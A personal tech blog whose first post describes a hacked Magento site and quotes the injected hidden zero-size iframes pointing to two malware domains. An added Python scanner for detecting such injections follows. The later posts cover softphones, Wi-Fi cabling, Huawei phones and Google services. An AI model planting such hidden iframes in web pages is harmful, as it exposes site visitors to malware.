Magento site was compromised

It was the first time I had seen a hacker come so close to me.

I was flooded with notification emails from Google AdSense with the subject “Your AdSense Publisher Policy Violation Report” from yesterday afternoon. I immediately tried to visit both blog.goods-pro.com and goods-pro.com to see what was going on. For either site, Chrome and Firefox showed a scary warning saying that the site contains malware (on desktop; Chrome for Android does not do a Safe Browsing check, and I don’t know if Firefox does).

It took me a while to find out which site contained malware. As blog.goods-pro.com was using AdSense but goods-pro.com wasn’t, at first I thought it was blog.goods-pro.com that had been hacked. blog.goods-pro.com was powered by WordPress, so I went through all the plugins and compared them with my other WordPress sites. I didn’t find a suspicious plugin.

Then I started to look into the main domain site goods-pro.com, which was running Magento. It took me quite a while to learn that there is a good tool at https://sitecheck.sucuri.net/ for checking what malware is on a site.

Then it took me another while to find out how the hacker did it. Basically the hacker compromised the password of one of the admins (not mine) and added the following code in three places (design/footer/copyright, design/head/includes, design/footer/absolute_footer) in Magento System >> Configuration.

<iframe src="https://hersosx2sk.tk/Rnjqs3" frameborder="0" width="0" height="0"></iframe><iframe src="https://mytokeasn2s.ru/mwRwD7" frameborder="0" width="0" height="0"></iframe>

hersosx2sk.tk and mytokeasn2s.ru are malware sites, and a site that links to them is regarded as a malware site as well.

When I disabled access for the compromised admin accounts (without removing the injected code), I found that Chrome and Firefox stopped giving those scary warnings, and visits to hersosx2sk.tk or mytokeasn2s.ru were redirected to Google. I don’t understand how Google can take control of these domains so quickly, but anyway, it is not my business.

At last I removed all the malware code and requested an AdSense review of blog.goods-pro.com.
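
A defender-side check for the injection described in this post, as an added example that is not part of the original post: it scans the three configuration fields named above for iframe or script tags that load from a host outside an allowlist, and flags zero-size frames. It assumes the rows are (path, value) pairs exported from Magento's core_config_data table; the allowlist and the sample rows are constructed.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# The three System >> Configuration fields named in the post.
WATCHED_PATHS = {"design/footer/copyright", "design/head/includes",
                 "design/footer/absolute_footer"}
# Assumption: hosts this shop legitimately embeds content from.
ALLOWED_HOSTS = {"goods-pro.com", "blog.goods-pro.com"}

class EmbedFinder(HTMLParser):
    """Collects iframe/script tags whose src points at a non-allowlisted host."""
    def __init__(self):
        super().__init__()
        self.hits = []

    def handle_starttag(self, tag, attrs):
        if tag not in ("iframe", "script"):
            return
        a = {k: (v or "") for k, v in attrs}
        host = (urlparse(a.get("src", "")).hostname or "").lower()
        if not host or host in ALLOWED_HOSTS:
            return
        # Zero-size frames are invisible to visitors, as in the injected code.
        hidden = a.get("width") == "0" or a.get("height") == "0"
        self.hits.append((tag, host, hidden))

def audit(rows):
    """rows: iterable of (path, value) pairs; returns a list of findings."""
    findings = []
    for path, value in rows:
        if path not in WATCHED_PATHS or not value:
            continue
        finder = EmbedFinder()
        finder.feed(value)
        for tag, host, hidden in finder.hits:
            findings.append({"path": path, "tag": tag, "host": host, "hidden": hidden})
    return findings

# Constructed sample rows; "malicious.example" is a placeholder host.
SAMPLE_ROWS = [
    ("design/footer/copyright", "&copy; Goods-Pro. All rights reserved."),
    ("design/head/includes",
     '<iframe src="https://malicious.example/x" width="0" height="0"></iframe>'),
    ("design/footer/absolute_footer",
     '<script src="https://goods-pro.com/js/a.js"></script>'),
    ("web/unsecure/base_url", "http://goods-pro.com/"),
]

print(audit(SAMPLE_ROWS))
```

Run on a schedule against a fresh export, any finding in these fields is worth a look, since they normally hold static text or markup an admin put there on purpose.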

Best SIP client soft phone is GS Wave

I have tried almost every VOIP soft phone app on Google Play. Before I found GS Wave, I reckoned Zoiper was the best soft phone, so I paid for its premium version to get its premium video call feature.

However, I never got this feature working. I wanted to see the video from my video door phone on my mobile with Zoiper. My video door phone supports the H264 video codec, but Zoiper supports VP8 unless I pay Zoiper again just for the H264 codec. Unlike audio codecs, which a VOIP server can translate between clients, video codecs are said to be P2P. (There may be a way to translate video codecs, but I don’t know how.)

I had video calls working between my video door phone and desktop SIP phones which are “hard phones” with H264 built in. And I had audio calls working on all devices. So I was not desperate for video on Zoiper.

Zoiper has a major defect. It cannot stay online 24/7 on the latest Android version (I tested on two Huawei Mate 8s and one P9) or on iOS. Many times the status bar shows it is online but actually it is not reachable. Zoiper was reliable on Android 4.x.x. I guess Zoiper “forgets” to re-register itself when the OS goes to sleep. For the above reasons I am reluctant to pay Zoiper any more money.

Recently I visited the Fanvil website and discovered that Fanvil had developed a soft phone called “Vdroid”, available as a free download. To my surprise, Vdroid integrates the G729 audio codec and the H264 video codec, which are premium codecs on Zoiper. (Later on I learnt that the G729 patent expired on 1st Jan, 2017, but Zoiper is still selling G729 for money. I knew nothing about H264.) However, Vdroid has too many bugs and is not mature software.

Then I thought other VOIP device manufacturers might have their own soft phones for the public. I checked Grandstream, Yealink and Cisco but only found Grandstream generously offering GS Wave. GS Wave has both Android and iOS versions; both work reliably, and both have G729 and H264 built in for free! I cannot wait any longer to recommend GS Wave to everyone. Google Play search results for “sip” or “voip” are overwhelmed by other apps, and GS Wave is nowhere in the ranking. But trust me, it is the best one.

 

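My experience on Wi-Fi distribution

I deeply understand how important full Wi-Fi coverage in a hotel is to today's travellers. I took a liking to a feeder-cable system and made up my mind to use it to improve my guests' stay. But I knew next to nothing about electronics; now that I have crossed the river by feeling for the stones, I am very happy to share what I learned.

  • Use flexible feeder cable wherever possible. My total feeder run is no more than 30 metres, yet I used LMR400, which is 10mm in diameter and hard to bend, and it made installation very difficult. Compared with the loss saved over using a flexible 5mm-diameter feeder cable, it was not really worth it.
  • Use densely placed antennas wherever possible. To install fewer antennas, I used one “industrial-grade” high-gain antenna in the corridor on each floor. It is big and odd-looking, yet its wall penetration is still poor; putting a miniature antenna in each room would have been better.
  • Have a full set of adapters ready wherever possible. Adapters in the UK are again daylight robbery; if this kind of accessory can be bought from China, don't buy it in the UK. I lacked experience and foresight: this small project used more than ten kinds of adapters, which I bought in nearly ten separate rounds, taking many detours.
  • Other things can be bought from China, but feeder cable is actually worth buying in the UK. So-called imported feeder cable bought in China is also expensive, and you cannot tell whether it is genuine. UK feeder cable is expensive of course, but clearance prices are a real bargain; thinking that I would replicate this success later, I stocked up on some extra.
  • A power splitter rated for 800 – 2500 MHz works perfectly well with 5800 MHz Wi-Fi. I guess the drawback is higher loss, but over a short run these disadvantages can be ignored entirely.
  • The two antennas of my dual-band AP carry 2.4G and 5.8G Wi-Fi respectively. If the feeder is connected to only one of them, say the 2.4G one, then 2.4G coverage is complete, and the 5.8G signal strength on the other will also be high (full bars), but the signal quality is so poor that no data can be transferred on 5.8G. This gave me a deep understanding that signal strength and signal quality are two entirely different concepts with no proportional relationship. I also made a fool of myself at the time: because I did not know which output I had connected while debugging, and found that the 5.8G side could not get online, I asked Google “why is the signal strength high but the signal quality poor”, and Google suggested it might be “signal interference”. As the feeder was laid parallel to power cables, I privately thought the carefully chosen LMR400 cable had such poor shielding; later I found the real cause and realised I had wrongly blamed LMR400.
  • I laid only one feeder cable through the floors. Once I discovered that the AP outputs its two bands on separate ports, I started looking for a component to combine the two bands. But something this specialised is hard to find. The almighty Taobao does sell it, but only one shop, and the seller seems to have gone out of business and is never online. Baidu Baike says a power splitter is also a combiner, so I tried using a cavity power splitter in reverse to combine the two bands, and was thrilled to find that such a cheap component and simple method can successfully combine and carry a dual-band signal. So I reflect on three things: Baidu is reliable sometimes, cheap can also be good, and true knowledge comes from practice. The first two are not always true, but the third is always right.

Having spent so much effort learning to do wireless distribution, why not use a Wi-Fi extender, which is readily available on the market? Well, let me explain: home-grade Wi-Fi extenders are unstable and reboot every few days, and commercial-grade Wi-Fi extenders are expensive, so it is better to spend some time on cabling. In addition, Wi-Fi extenders suffer from problems such as co-channel contention and the lack of seamless roaming. Why not use ACAP to achieve seamless roaming? Again it comes down to cost, stability and the number of clients supported; the ACAP solution is best left to bigger projects.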

Huawei Mate 8 and Google

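Ever since I learned that the Huawei app store has a Google framework installer app, I stopped waiting for the international version of the Huawei Mate 8 to launch and bought a China-market all-network model to try it out.

Installing the Google framework on the Mate 8 went smoothly, but I ran into two unusual problems:

The first was that Google Contacts were not synced to the phone's contacts. I later found that I also had to find and install “联系人同步服务” (contacts sync service) from the Huawei app store, and after installing it, grant the “Google 联系人同步” (Google Contacts Sync) app all contacts permissions in the permission manager; they had been set to “Prompt” and had to be changed to “Allow”. It only worked properly after a final reboot.

The second was that only one Google account could be added. I later found that a second account can be added in the GUI of some Google apps. I added a second Google account in Maps, and by this roundabout route achieved the same effect as adding a second Google account in Settings.

Although the Mate 8 finally connected to Google services, some details of the China-market phone are really awkward to use. All in all, if there were a pill for regret, I would choose to wait for the international Mate 8 to launch.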

Huawei app store has gapps

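I had always thought that installing the Google framework on Android meant turning to developer sites such as XDA Developers. But I am afraid of viruses for one thing and of hassle for another, and I always want the original device to come with the Google framework out of the box, so in the smartphone era I have never bought a China-market phone, because they have no Google framework.

But the Huawei Mate 8 has been quite popular recently and I have followed it for a long time. Unfortunately there was no international version for ages; only today did I hear that Huawei released the Mate 8 international version two days ago, but it will probably be a few more months before it is seen on the market.

While I was sighing over this, a friend told me that the Google framework can be downloaded right from the Huawei app store, and that once installed, Google services can be used just as on the international version. Could it be that good? I recalled that Grandstream had used the same roundabout tactic before, but I did not expect Huawei to as well. I hurried to the Huawei app store to look, and there really was an app called “谷歌框架安装神器” (Google framework installer). I tried it on one of my mum's China-market phones and the Google framework installed smoothly. I then used it to install the Google framework on a Fanvil D900 Android IP Phone, which also succeeded smoothly (the D900 has to be rooted before installation). I bought the D900 two years ago and always felt it was of little use, precisely because it could not use Google services. At the time I contacted Fanvil technical support frequently; they sent me several firmware images to update with, none of which managed to install the Google framework, and I eventually gave up. Now that Huawei's “谷歌框架安装神器” has solved it in one go, how could I not be excited? (However, later today I downloaded the latest D900 firmware from the Fanvil website, and after updating found that this firmware already includes the Google framework; only Google Play is not installed, but a Google Play apk is stored in the root directory, so installing that is enough, and no root is needed.)

In short, Huawei being able to provide the Google framework leaves me with no more reservations about buying a China-market Huawei phone. While I was at it I looked at the Xiaomi app store, which does not provide the Google framework, so I'll just keep advising people not to buy Xiaomi.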

WP Social Login back to working

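The WP Social Login plugin had not been working properly on 芳草苑 for a long time. Logging in with a Google account was impossible, and the error message shown was: Oops! We ran into an issue. Request failed. Either you have cancelled the authentication or Google refused the connection.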

Google authentication failed

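Today I finally found the cause. It was not actually the plugin's fault: the Google+ API had not been enabled in the Google developer project settings. It is disabled by default; enabling it is all that is needed.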

Enable Google+ API

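I vaguely remember news that after the Google+ API was released, WP Social Login moved from the Google API to the Google+ API. But I did not look closely at the time, and I still cannot work out what the difference between the Google API and the Google+ API is. IT moves too fast; many concepts can only be grasped superficially, and being able to use things fully and well is already good enough.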

Google Story can be an artist

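Google Now can serve as a little assistant, but Google Story deserves to be called an artist.

She can touch up utterly ordinary photos to give them a special charm, and dress up photos that were already out of the ordinary to look truly imposing.

By comparison, when we pay a lot of money for a designer to design a promotional brochure, the result is no better than this, while Story albums, which Google generates by machine, can beat 50% of human designers; I cannot help feeling a little discouraged.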

Google Story 1
Google Story 2
Google Story 3
Google Story 4
Google Story 5
Google Story 6
Google Story 7
Google Story 8

Hangouts SMS integration is useless

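The Hangouts app on my Android phone showed that an update was available, reportedly with SMS support, and I was looking forward to the update.

I was hoping to type an SMS in Hangouts on my computer, have the content synced to my phone, and then have it sent directly to the contact. Although I already send and receive SMS from my computer with Talk2phone, Hangouts is a first-party Android app, so of course I hoped it could take over this function. But once I used it after the update I was very disappointed. Hangouts on the computer cannot see SMS contacts (which are really just mobile numbers) at all; only Hangouts on the phone can, so sending SMS from the computer is impossible. Hangouts SMS integration merely uses Hangouts to read and write the SMS app, duplicating the SMS app's receiving and sending work.

Hangouts SMS integration puts instant-messaging content into a single app, which has no real value. Worse, I previously had the Talk2phone app installed on my phone to send and receive SMS from my computer (mainly to send), and now that Hangouts has been updated, Talk2phone's bot contact mobilenotificationsapp@appspot.com has disappeared too, presumably because Talk2phone has not been updated accordingly.

Not only that, the bots of other apps have disappeared as well, such as livechat.

I quickly restored the desktop version of Hangouts to an earlier version, and all the bots came back. Hangouts SMS integration really gets in the way. Google did not think this one through and released an immature feature. The many short-lived products it launched before did not affect much, but Gtalk/Hangouts is after all a mature product; the starting point is different.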

 

 

Google Drive server rejected files uploaded in Windows

Google Drive server rejected file uploaded in Windows

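I found that I could not upload files to Google Drive under Windows. I was using FireFox, and the error message was “Server rejected”. At first I thought the Google server was down, but when I switched to FireFox on Fedora everything worked. Refusing to believe it, I tried uploading files with various extensions under Windows; I tried .jpg, .doc and .pdf, and they all failed.

I rarely work in Windows, so I do not know how long this problem had existed. Could Google be feuding with Microsoft and teaching Windows users a lesson? I did not think Google would do something that hurts others without benefiting itself, but I was not sure. So I tried changing FireFox's User Agent under Windows: in about:config I created a new string named general.useragent.override with the value Mozilla/5.0 (X11; Linux x86_64; rv:20.0) Gecko/20100101 Firefox/20.0.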

Custom FireFox user agent

This made FireFox for Windows look like FireFox for Linux.

Forged user agent

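However, Google Drive still said “Server rejected”, which confirmed that Google was not treating Windows users differently.

Next, I looked further into why FireFox could not upload files; it seems to be an occasional result of being logged in to Google with multiple accounts. Some say uploads fail to any account other than the default one, but I tried it myself and that claim is not accurate either. It seems best not to dwell on this problem: clear the browser history and everything is back to normal.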

Google+ makes perfect panoramic pictures

Google+ is so powerful!

I took several pictures when I visited the University of Brighton a while ago. I did not mean to make them into a panoramic scene at that time; I just stood by the road and took several random pictures. Today, looking through my Google+ photos, I found this picture: Google+ had automatically made a panoramic picture for me.

American Express Community Stadium "made" by Google+

Looking at this picture, I am shocked, because I cannot find the seam. I have tried to make panoramic pictures before by different methods: the built-in function of a camera, software, and a smartphone with a 3-axis geomagnetic sensor. None of them came up with such a good result, even when I shot the photos with a tripod.

So I am wondering if this is a viable approach for an even better result:

  1. Shoot photos with an SLR camera on a tripod.
  2. Transfer the photos to an Android phone.
  3. Will Android upload the photos and Google+ make a panoramic picture?